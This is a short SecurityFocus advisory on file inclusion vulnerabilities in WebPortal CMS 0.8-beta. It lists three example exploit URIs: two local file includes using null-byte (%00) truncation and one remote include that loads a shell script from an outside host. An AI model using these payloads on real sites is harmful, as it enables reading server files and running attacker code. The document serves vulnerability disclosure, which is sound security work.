WebPortal CMS Multiple Remote and Local File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/path/webportal-0.8-beta/libraries/helpdocs/help.php?lang=[local file]%00
http://www.example.com/path/webportal-0.8-beta/indexk.php?lib_path=http://www.example2.com/shell.txt?
http://www.example.com/path/webportal-0.8-beta/index.php?error=[local file]%00


 

Privacy Statement
Copyright 2010, SecurityFocus